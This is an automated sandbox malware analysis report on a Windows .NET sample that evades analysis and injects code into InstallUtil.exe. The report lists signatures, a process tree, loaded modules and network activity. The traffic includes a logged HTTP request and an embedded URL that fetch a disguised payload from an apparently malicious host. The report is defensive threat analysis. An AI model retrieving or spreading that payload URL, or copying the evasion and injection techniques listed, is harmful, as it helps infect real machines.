Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TiOWA908TP.exe

Overview

General Information

Sample name:TiOWA908TP.exe
renamed because original name is a hash value
Original sample name:f1bbcbcf580673f86692045f0e6c1141.exe
Analysis ID:1590837
MD5:f1bbcbcf580673f86692045f0e6c1141
SHA1:14b1bb7f931dad06ca86e7d1921a3dd09153fa49
SHA256:019e924a0b82a0c448cb283cb72b47ad019ecc4de05fddbd41c983f704271c03
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
AI detected suspicious sample
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w11x64_office
  • TiOWA908TP.exe (PID: 8020 cmdline: "C:\Users\user\Desktop\TiOWA908TP.exe" MD5: F1BBCBCF580673F86692045F0E6C1141)
    • InstallUtil.exe (PID: 7164 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 25132339A1686033BDC9561ECFE57719)
      • WerFault.exe (PID: 6432 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7164 -s 1192 MD5: AA47AAA34035C6EB09F8ACA062E66C9D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1702291708.0000000006B20000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.1680699788.0000000002E58000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      Process Memory Space: TiOWA908TP.exe PID: 8020JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: TiOWA908TP.exe PID: 8020JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          Process Memory Space: InstallUtil.exe PID: 7164JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.TiOWA908TP.exe.6b20000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.TiOWA908TP.exe.6b20000.7.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: TiOWA908TP.exeAvira: detected
                Multi AV Scanner detection for submitted file
                Source: TiOWA908TP.exeVirustotal: Detection: 18%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: TiOWA908TP.exeJoe Sandbox ML: detected
                Source: TiOWA908TP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: TiOWA908TP.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb% source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: TiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1699367398.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B30000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: TiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1699367398.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: TiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1702774228.0000000006C60000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: TiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1702774228.0000000006C60000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: nramework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000008.00000002.2678123316.00000000005F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000008.00000002.2678123316.00000000005F8000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2678445753.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb__b77a5c561934e089\mscorlib.pdb\U" source: InstallUtil.exe, 00000008.00000002.2678123316.00000000005F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdbk source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B30000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: nsymbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000008.00000002.2678123316.00000000005F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb@q source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .pdb_ source: InstallUtil.exe, 00000008.00000002.2678123316.00000000005F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb0( source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.pdb source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B30000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb' source: InstallUtil.exe, 00000008.00000002.2678123316.00000000005F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B30000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: n8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000008.00000002.2678123316.00000000005F8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B30000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb* source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B30000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbN source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B30000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdbl= source: InstallUtil.exe, 00000008.00000002.2678445753.0000000000B30000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 4x nop then jmp 06CCDCB2h0_2_06CCDAC9
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 4x nop then jmp 06CCDCB2h0_2_06CCDAD8
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 4x nop then jmp 06CCD3D7h0_2_06CCD347
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 4x nop then jmp 06CCD3D7h0_2_06CCD378
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 4x nop then jmp 06CE35E3h0_2_06CE3663
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 4x nop then jmp 06CE35E3h0_2_06CE3378
                Source: global trafficHTTP traffic detected: GET /post-postlogin/Gjflop.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: cud-senegal.orgConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /post-postlogin/Gjflop.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: cud-senegal.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: cud-senegal.org
                Source: global trafficDNS traffic detected: DNS query: ecn.dev.virtualearth.net
                Source: global trafficDNS traffic detected: DNS query: browser.events.data.msn.cn
                Source: TiOWA908TP.exe, 00000000.00000002.1678867783.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: TiOWA908TP.exe, 00000000.00000002.1680699788.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: TiOWA908TP.exe, 00000000.00000002.1680699788.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cud-senegal.org
                Source: TiOWA908TP.exeString found in binary or memory: https://cud-senegal.org/post-postlogin/Gjflop.mp3
                Source: TiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1702774228.0000000006C60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: TiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1702774228.0000000006C60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: TiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1702774228.0000000006C60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: TiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1702774228.0000000006C60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: TiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1680699788.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1702774228.0000000006C60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: TiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1702774228.0000000006C60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05B838E0 NtProtectVirtualMemory,0_2_05B838E0
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05B87388 NtResumeThread,0_2_05B87388
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05B838D9 NtProtectVirtualMemory,0_2_05B838D9
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05B87383 NtResumeThread,0_2_05B87383
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_013527300_2_01352730
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_013527400_2_01352740
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05B804880_2_05B80488
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05B856580_2_05B85658
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05B85D880_2_05B85D88
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05B829700_2_05B82970
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05B8296B0_2_05B8296B
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05B804790_2_05B80479
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05B8564B0_2_05B8564B
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05CA33FF0_2_05CA33FF
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05CA15980_2_05CA1598
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05CA15A80_2_05CA15A8
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05CAB1C00_2_05CAB1C0
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05CA00400_2_05CA0040
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05CA00210_2_05CA0021
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05CA4A080_2_05CA4A08
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_068F55280_2_068F5528
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_068F92A30_2_068F92A3
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_068FFA080_2_068FFA08
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_068F79300_2_068F7930
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_068F1A890_2_068F1A89
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_068F1A980_2_068F1A98
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_068FD8880_2_068FD888
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_068FD8980_2_068FD898
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_069127A00_2_069127A0
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0691279B0_2_0691279B
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0694761F0_2_0694761F
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0694E7000_2_0694E700
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06946F580_2_06946F58
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06946F680_2_06946F68
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0694E9380_2_0694E938
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06C5A7080_2_06C5A708
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06C599900_2_06C59990
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06C5A6F90_2_06C5A6F9
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06C55E200_2_06C55E20
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06C577F30_2_06C577F3
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06C577F80_2_06C577F8
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06C500400_2_06C50040
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06C500110_2_06C50011
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06C599800_2_06C59980
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06C5F1980_2_06C5F198
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CC9EB80_2_06CC9EB8
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CCF5600_2_06CCF560
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CCF50A0_2_06CCF50A
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CCF5520_2_06CCF552
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CEB2A80_2_06CEB2A8
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CE16400_2_06CE1640
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CE16500_2_06CE1650
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06CEB29D0_2_06CEB29D
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06DEF9300_2_06DEF930
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06DEDFD00_2_06DEDFD0
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06DD00400_2_06DD0040
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06DD00070_2_06DD0007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_026A10288_2_026A1028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_026A10188_2_026A1018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7164 -s 1192
                Source: TiOWA908TP.exe, 00000000.00000000.1412015289.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUyhul.exe, vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.1696791914.00000000040F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKaxhapdc.exe" vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.1680699788.0000000002E58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.1680699788.0000000003226000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKaxhapdc.exe" vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.1702774228.0000000006C60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.1678867783.00000000010B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.1700822671.0000000006760000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNiiug.dll" vs TiOWA908TP.exe
                Source: TiOWA908TP.exe, 00000000.00000002.1699367398.0000000005BA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs TiOWA908TP.exe
                Source: TiOWA908TP.exeBinary or memory string: OriginalFilenameUyhul.exe, vs TiOWA908TP.exe
                Source: TiOWA908TP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal88.evad.winEXE@4/0@3/1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\9f4f7acc-1093-45fe-a7b7-b10400f8438aJump to behavior
                Source: TiOWA908TP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: TiOWA908TP.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\TiOWA908TP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: TiOWA908TP.exeVirustotal: Detection: 18%
                Source: unknownProcess created: C:\Users\user\Desktop\TiOWA908TP.exe "C:\Users\user\Desktop\TiOWA908TP.exe"
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7164 -s 1192
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
